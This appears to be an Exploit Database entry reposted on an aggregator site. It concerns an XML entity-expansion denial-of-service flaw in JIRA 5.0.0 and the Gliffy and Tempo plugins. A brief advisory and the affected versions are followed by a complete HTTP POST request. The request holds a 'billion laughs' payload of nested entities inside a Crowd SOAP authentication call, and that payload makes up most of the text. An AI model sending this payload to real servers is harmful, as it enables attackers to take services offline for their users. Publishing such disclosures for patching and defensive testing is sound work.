Atlassian Tempo 6.4.3 / JIRA 5.0.0 / Gliffy 3.7.0 – XML Parsing Denial of Service

• Exploit Database
• 11 阅读

• 作者： anonymous
  日期： 2012-05-17
• 类别：

  • dos
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/37218/

• source: https://www.securityfocus.com/bid/53595/info
  
  JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data.
  
  Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application.
  
  The following versions are affected:
  
  Versions prior to JIRA 5.0.1 are vulnerable.
  Versions prior to Gliffy 3.7.1 are vulnerable.
  Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable. 
  
  POST somehost.com HTTP/1.1
  Accept-Encoding: gzip,deflate
  Content-Type: text/xml;charset=UTF-8
  SOAPAction: ""
  User-Agent: Jakarta Commons-HttpClient/3.1
  Host: somehost.com
  Content-Length: 1577
  
  <?xml version="1.0" encoding="utf-8" ?>
  <!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
  ]>
  <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com">
   <soapenv:Header/>
   <soapenv:Body>
  <urn:authenticateApplication>
   <urn:in0>
  <aut:credential>
   <aut:credential>stuff1</aut:credential>
   <aut:encryptedCredential>?&lol9;</aut:encryptedCredential>
  </aut:credential>
  <aut:name>stuff3</aut:name>
  <aut:validationFactors>
   <aut:ValidationFactor>
  <aut:name>stuff4</aut:name>
  <aut:value>stuff5</aut:value>
   </aut:ValidationFactor>
  </aut:validationFactors>
   </urn:in0>
  </urn:authenticateApplication>
   </soapenv:Body>
  </soapenv:Envelope>